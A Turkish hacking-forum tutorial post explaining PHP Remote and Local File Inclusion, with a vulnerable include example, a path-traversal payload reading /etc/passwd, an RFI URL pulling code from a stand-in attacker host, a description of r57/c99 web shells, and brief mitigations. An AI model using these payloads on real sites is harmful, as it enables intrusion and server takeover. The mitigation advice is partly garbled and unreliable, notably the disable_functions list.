THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Hack Eğitimi -2

EKEGOREGEN - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2017
Nereden:
İzmir
Mesajlar:
533
Konular:
81
Teşekkür (Etti):
80
Teşekkür (Aldı):
42
Ticaret:
(0) %
18-02-2017 13:20
#1
Hack Eğitimi -2
Merhaba devrelerim ve üstlerim.Bugün hack derslerinin 2. bölümüyle karşınızdayım.Konumuz RFI-LFI.Haydi başlayalım.

File inclusionosya ekleme denilen bir zayıflıktır.Bu saldırılar php web dizilimine karşı bir açıktır.Kötü niyetli saldırgan local den remotea kod çalıştırmasını sağlar.

RFI(Remote File İnclusion):Uzakdan dosya ekleyerek kod çalıştırılmasıdır.
LFI(Local File İnclusion):[B]Yerelden dosya ekleyerek kod çalıştırılmasıdır.php web programlama dili ile kodlanmış uygulamalarda yazılımların tanımladıkları değişkene değer atamaması veya atanan değerlerin filtrelenmemesinden kaynaklanmaktadır.
aşağıda verdiğim örnek kod ile detayları uygulamalı olarak inceleyelim;

index.php
<?php include($_GET[’sayfa’]) ?

Bu gibi bağlantılarla aşağıda verdiğim gibi bağlantı istekleri oluşur;

index.php?sayfa=haberler.php
index.php?sayfa=duyurular.php

En basit olarak bu yazılım,LFI zayıflığını oluşturur.

index.php?sayfa=../../../../../../../../../etc/passwd
yukarıda verdiğim ../ bulunduğu dizinden bir üst dizine çıkmasını sağlar ve /etc/passwd içeriğini ekrana yazar.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh

………….


RFI ( Remote File İnclusion ) Örnek:

index2.php

include (“$duyurular/guncel/duyuru.php”);
bu satırdaki “$” işareti bulunan parametreden doğan hatalı kodlama ile uzaktan dosya çağırmak mümkündür.
“http://www.hedef.com/labs/index2.php?duyurular= http://saldirgan.net/listpatch.txt?”

yukarıdaki şekilde, http://saldırgan.net/listpatch.txt?
bulunan zararlı kodlar http://www.hedef.com üzerinde çalışacaktır.
bu noktada saldırgan yönlendirilen alanda shell ve listpatch isimleriyle tabir edilen kötü amaçlı kodları kullanarak sunucu üzerinde istenilen işlemleri gerçekleştirebilmektir.bunların en çok kullanılanları r57 ve c99 dur.


R57 ve özellikleri
R57 web üzerinden komut çalıştırma ,dizin atlatma,dosya düzenleme,yeni dosya oluşturma,dosya çalıştırma,veritabanı bağlantılarını görme,dosya içeriğini okuma,dosya yükleme,dosya indirme özellikleri ile sunucu üzerinde birçok yetkisiz gerçekleştirilmektedir.

Özellikle hosting firmaları çok fazla siteyi aynı sunucuda bulundurduğunu düşünürsek herhangi bir sitede açık olması durumunda o sunucu üzerinde bulunan tüm web siteleri tehlike altındadır.
arkadaşlar her zamanki gibi bununda korunma yöntemlerini anlatacağım.
Korunma
Yöntem 1
yazdığım kodların RFI açıklarına karşı kontrol edilmesi.
Zayıf kod:
<?php
include ($ornek.’../index.php’);
?>
Güvenli kod
<?php
$ornek= ’veri’;
include ($ornek.’../index.php’);
?>
örnek değişkenine tanımlama yapıldığından dış verinin girişine izin vermeyecek. ve RFI&LFI açıklarından korunmanızı sağlayacak.
Yöntem2
PHP.ini
/etc/php.ini dosyasının içini açarak disable_function değerini bulup yanına aşağıda verdiğim özellikleri yazarak çalışmalarını engelleyebiliriz.
system,passthru, exec,popen proc_close,proc_get_status,proc_nice, proc_open, allow_url_fopen, shell, shellexec

--------------------- Ne Mutlu TÜRKÜM Diyene..!

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler